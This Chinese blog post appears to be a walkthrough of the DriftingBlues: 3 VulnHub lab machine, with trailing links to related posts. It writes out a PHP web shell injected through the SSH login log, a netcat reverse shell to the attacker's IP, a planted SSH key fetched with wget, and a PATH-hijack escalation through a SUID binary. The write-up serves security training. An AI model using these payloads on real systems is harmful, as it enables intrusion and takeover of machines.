DRIFTINGBLUES: 3实战演练

最新推荐文章于 2024-11-14 23:00:37 发布
最新推荐文章于 2024-11-14 23:00:37 发布
阅读量507 收藏
点赞数
分类专栏: vulnhub 文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/longlangci/article/details/131339639
版权
本文详细记录了一次针对DRIFTINGBLUES靶机的渗透测试过程,包括端口扫描、信息收集、利用网站漏洞写入shell、反弹shell以及后续的后渗透步骤,如SSH登录、查找并读取flag等,展示了网络安全攻防的技术流程。
摘要由CSDN通过智能技术生成

文章目录

DRIFTINGBLUES: 3实战演练

一、前期准备
1、相关信息

靶机网站:https://www.vulnhub.com/entry/driftingblues-3,656/

设备名称IP地址
攻击机:kali192.168.2.20
靶机:DRIFTINGBLUES: 3192.168.2.25
二、信息收集
1、端口扫描
┌──(kali㉿kali)-[~]
└─$ nmap -A 192.168.2.25

# 开放SSH:22端口、WEB:80端口
# SSH:22端口版本号为OpenSSH 7.9p1 Debian 10+deb10u2
# WEB:80端口中间件为Apache httpd 2.4.38
# robots目录下有一个/eventadmins

在这里插入图片描述

2、访问网站
http://192.168.2.25/

在这里插入图片描述

3、访问网页
http://192.168.2.25/eventadmins/

在这里插入图片描述

4、翻译内容
# 原文
man there's a problem with ssh
john said "it's poisonous!!! stay away!!!"
idk if he's mentally challenged
please find and fix it
also check /littlequeenofspades.html
your buddy, buddyG
# 译文
伙计ssh有问题
约翰说:“它有毒!!!离我远点!!!”
idk如果他有精神障碍
请找到并修复它
另请检查/lightqueenofspades.html
你的好友

# 发现一个路径/lightqueenofspades.html
5、访问网页
http://192.168.2.25/littlequeenofspades.html

在这里插入图片描述

6、翻译内容
# 原文
Now, she is a little queen of spades, and the men will not let her be
Mmmm, she is the little queen of spades, and the men will not let her be
Everytime she makes a spread, hoo fair brown, cold chill just runs all over me
I'm gon' get me a gamblin' woman, if the last thing that I do
Eee, gon' get me a gamblin' woman, if it's the last thing that I do
Well, a man don't need a woman, ooh fair brown, that he got to give all his money to
Everybody say she got a mojo, now she's been usin' that stuff
Mmmm, mmmm, 'verybody says she got a mojo, 'cause she been usin' that stuff
But she got a way trimmin' down, hoo fair brown, and I mean it's most too tough
Now, little girl, since I am the king, baby, and you is a queen
Ooo eee, since I am the king baby, and you is a queen
Le's us put our heads together, hoo fair brown, then we can make our money green 
# 译文
现在,她成了黑桃皇后,男人们不会让她成为黑桃皇后的
嗯,她是黑桃皇后,男人们不会让她成为黑桃皇后的
每次她做一次涂抹,我全身都是苍白的棕色,冰冷的寒意
如果我做的最后一件事就是给我找个女人
Eee,如果这是我做的最后一件事,你会给我找个赌博的女人
好吧,一个男人不需要一个女人,哦,漂亮的棕色,他可以把所有的钱都给她
每个人都说她有魔力,现在她一直在用那些东西
嗯,嗯,每个人都说她有魔力,因为她一直在做那些事
但她有一条路要走,胡,浅棕色,我的意思是,这太难了
现在,小女孩,既然我是国王,宝贝,而你是王后
哦,因为我是国王,而你是王后
让我们集思广益,哇,棕色的,然后我们可以把钱变成绿色的
8、查看源码
view-source:http://192.168.2.25/littlequeenofspades.html

# 发现一串密文:aW50cnVkZXI/IEwyRmtiV2x1YzJacGVHbDBMbkJvY0E9PQ==

在这里插入图片描述

9、解密
https://base64.us/

# intruder? /adminsfixit.php

在这里插入图片描述

在这里插入图片描述

10、访问网页
http://192.168.2.25/adminsfixit.php

在这里插入图片描述

11、写入shell并登录
┌──(kali㉿kali)-[~]
└─$ ssh '<?php system($_GET['cmd']);?>'@192.168.2.25

在这里插入图片描述

12、连接shell
view-source:http://192.168.2.25/adminsfixit.php?cmd=ls%20-la

在这里插入图片描述

13、查找nc
view-source:http://192.168.2.25/adminsfixit.php?cmd=which%20nc

在这里插入图片描述

14、反弹shell
view-source:http://192.168.2.25/adminsfixit.php?cmd=nc -e /bin/bash 192.168.2.20 9000

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 9000

在这里插入图片描述

在这里插入图片描述

三、后渗透
1、进入家目录查找文件
www-data@driftingblues:/var/www$ cd /home
www-data@driftingblues:/home$ ls -alh
www-data@driftingblues:/home$ cd robertj
www-data@driftingblues:/home/robertj$ ls -alh

在这里插入图片描述

2、写入ssh密钥
┌──(kali㉿kali)-[~]
└─$ ssh-keygen -f sain

┌──(kali㉿kali)-[~]
└─$ cp sain.pub ./authorized_keys

┌──(kali㉿kali)-[~]
└─$ python3 -m http.server

www-data@driftingblues:/home/robertj$ cd .ssh       
www-data@driftingblues:/home/robertj/.ssh$ wget 192.168.2.20:8000/authorized_keys

在这里插入图片描述

在这里插入图片描述

3、SSH登录
┌──(kali㉿kali)-[~]
└─$ ssh robertj@192.168.2.25 -i sain

在这里插入图片描述

4、查看第一个flag
robertj@driftingblues:~$ ls -alh
robertj@driftingblues:~$ cat user.txt

在这里插入图片描述

5、查看权限和SUID文件
robertj@driftingblues:~$ find / -user root -perm /4000 2>/dev/null

在这里插入图片描述

6、查看文件
robertj@driftingblues:~$ /usr/bin/getinfo

在这里插入图片描述

7、写入shell并设置变量
robertj@driftingblues:~$ cd /tmp/
robertj@driftingblues:/tmp$ echo '/bin/bash -i' > ip
robertj@driftingblues:/tmp$ chmod +x ip 
robertj@driftingblues:/tmp$ cd ~
robertj@driftingblues:~$ export PATH=/tmp/:$PATH
robertj@driftingblues:~$ /usr/bin/getinfo

在这里插入图片描述

8、查看第二个flag
root@driftingblues:~# cd /root
root@driftingblues:/root# ls -alh
root@driftingblues:/root# cat root.txt

在这里插入图片描述

liebe1*1
关注
专栏目录
VulnHub-DRIFTINGBLUES: 3
sanqin_的博客
07-11 632
靶机 DHCP 未能正确分配 IP :看这里 靶机地址:http://www.vulnhub.com/entry/driftingblues-3,656/ 按照流程先用nmap扫描 nmap -sP ip/mask #扫描局域网内存活主机 nmap -sV -A -p- ip #扫描靶机开放服务 可见开发了两个端口,22:ssh,80:http 在网站一阵遨游后没发现啥(其实就随便看看),上dirb robots.txt给出了一个目录 访问,提示说ssh有问题,并且又给出一个目录, 这次页面提
靶机渗透练习03-driftingblues3
Force~
03-26 1783
靶机地址: https://www.vulnhub.com/entry/driftingblues-3,656/ 1、主机探活 arp-scan -I eth0 -l (指定网卡扫) 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) masscan 192.168.111.0/24 -p 80,22 (masscan 扫描的网段 -p 扫描端口号) netdiscover -i eth0 -r 192.168.184.0/24 (netdiscover -i 网卡-r 网段) nmap -s.
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-3
Aluxian_的博客
06-15 1684
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这期更新一下Vulnhub DriftingBlues 系列 还是老样子找到FLAG即可,可能比较偏向CTF点。官网地址: https://www.vulnhub.com/entry/driftingblues-3,656/下载好了把安装包解压 然后试用VMware即可。 前言:这里又是DriftingBlues-2的问题 需要自己配网卡 具体参考:
靶机20 driftingblues3
honest_gg的博客
11-01 1066
获取标志 难度:简单
2014江西公务员面试备考:考前实战演练及解析五十九.doc
02-16
2014江西公务员面试备考:考前实战演练及解析五十九.doc
FPGA设计实战演练(高级技巧篇)
11-16
一生中有幸成为新发现或新思想的一部分的机会屈指可数。某些思想或革新会极大地改变我们所生活的 世界。想一想如果生物科学家完成了整个人类基因的绘制 — 确定了DNA结构的最后一个基因,美国国 ...
HACK ME PLEASE: 1实战演练
龙狼刺的博客
05-24 1126
HACK ME PLEASE 1
CSRF防护:CSRF防护实战演练.docx
08-27
CSRF防护:CSRF防护实战演练.docx
物联网之安全算法:访问控制:物联网安全实战演练.docx
10-25
物联网之安全算法:访问控制:物联网安全实战演练.docx
driftingblues3靶机(auth.log日志、命令执行)
m0_66299232的博客
12-19 721
1.回弹shell成功后用python来弹交互式shell,在robertj用户下发现.ssh目录。那么我们就可以在用户名处注入可以被执行的脚本然后尝试访问他就可以实现RCE命令执行。8.把ip给替换成可以执行提权的命令,然后把环境变量改了,就可以成功提权。2.看下敏感目录里的信息,不让访问/eventadmins目录。等几分钟再执行curl命令,发现成功记录了登陆的信息。1.故意登录ssh,造成报错,看能否在日志里看到。7.查看之后,发现特别像auth.log的内容。9.最后进入root目录,成功拿下!
DriftingBlues-3靶机进行渗透测试
zll___的博客
04-01 374
DriftingBlues-3靶机进行渗透测试
19 真题案例(四):大厂真题实战演练.mp4
05-30
19 真题案例(四):大厂真题实战演练.mp4
计算机视觉实战演练:算法与应用_思维导图1
08-03
实战演练深入探讨了计算机视觉的算法及其在实际中的应用,旨在帮助读者掌握核心概念并提升解决视觉问题的能力。 首先,【绪论篇】介绍了计算机视觉的基本概念,包括对计算机视觉的概述,它涉及利用计算机对图像...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8546
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全:守护数字世界的坚固防线
fj800j的专栏
11-14 145
首先,加强网络安全法律法规的制定和完善,为网络安全提供有力的法律保障。其次,提高网络安全技术水平,研发更加先进的安全防护产品和解决方案,以应对不断变化的网络威胁。此外,加强网络安全教育和宣传,提高公众的网络安全意识和防范能力,也是至关重要的。因此,加强网络安全防护,构建坚固的数字防线,已成为当务之急。同时,我们也需要加强国际合作,共同应对跨国网络犯罪和网络攻击,维护网络空间的和平与安全。让我们携手共进,共同守护这个数字世界的坚固防线,为构建一个安全、稳定、繁荣的网络空间贡献力量。
网络安全之SQL初步注入
blue_2021010615的博客
11-10 575
{"username":"hahah","password":123456,"time":"6546536435536"}类似于这种就是json串,常见于前后端分离项目,用于不同语言进行调用数据。查询1的时候,会展示username=1的用户数据,可以测试是否有注入点(闭合单引号并构造永真条件。用户输入的数据会被替换到SQL语句中的$name位置。此时应该想到XX型,去闭合括号尝试。利用burpsuilte抓包。闭合引号的同时还需要闭合括号。平台使用pikachu。此处有注入点,为XX型。
网络安全 | 漏洞挖掘】隐藏的 DOS 技术
等风来
11-11 381
我调查了这些参数的用途,发现它们被传递给了第三方服务,且该服务的文档说明这些参数是安全的。你可以试试这样做:前往https://ash-speed.hetzner.com/并找到一个测试文件(大小大约1到10 GB),如果服务器等待URL请求完成,你可以通过大量此类请求来淹没服务器,从而导致它最终崩溃。于是我发送了一个包含1000个UUID的列表,结果网站在60秒后超时,并出现了显著的延迟。在我的案例中,这导致了客户网站的DOS攻击,问题被发现并快速修复,甚至在我报告漏洞之前。
关于网络安全里蜜罐的详细介绍
2401_88326437的博客
11-14 728
另一方面,高交互性蜜罐旨在使黑客在蜜罐内花费尽可能多的时间,从而提供有关他们的意图和目标以及他们正在利用的漏洞和所用作案手法的大量信息。将两种类型结合使用,可以通过添加有关高交互蜜罐的意图、通信和漏洞利用的信息来优化有关低交互蜜罐的威胁类型的基本信息。它模仿黑客的目标,利用黑客的入侵企图来获取网络犯罪分子的信息以及他们的行动方式,或者将他们从其他目标上引开。蜜罐的一个定义来自间谍世界,玛塔哈里 (Mata Hari) 式的间谍将恋爱关系用作窃取秘密的方式,被描述为设置“美人计”或“蜜罐”。
《Python网络安全项目实战》项目5 编写网站扫描程序
最新发布
zheng_ruiguo的专栏
11-14 400
WEB网站安全渗透测试过程中需要进行目录扫描和网站爬行,网上可以找到一些不错的工具软件,但是对于别人写的工具是否安全可靠有待商榷,所以我们如果能够写出自己的网站扫描和爬行程序,对于我们的工作会有极大的帮助。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

liebe1*1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值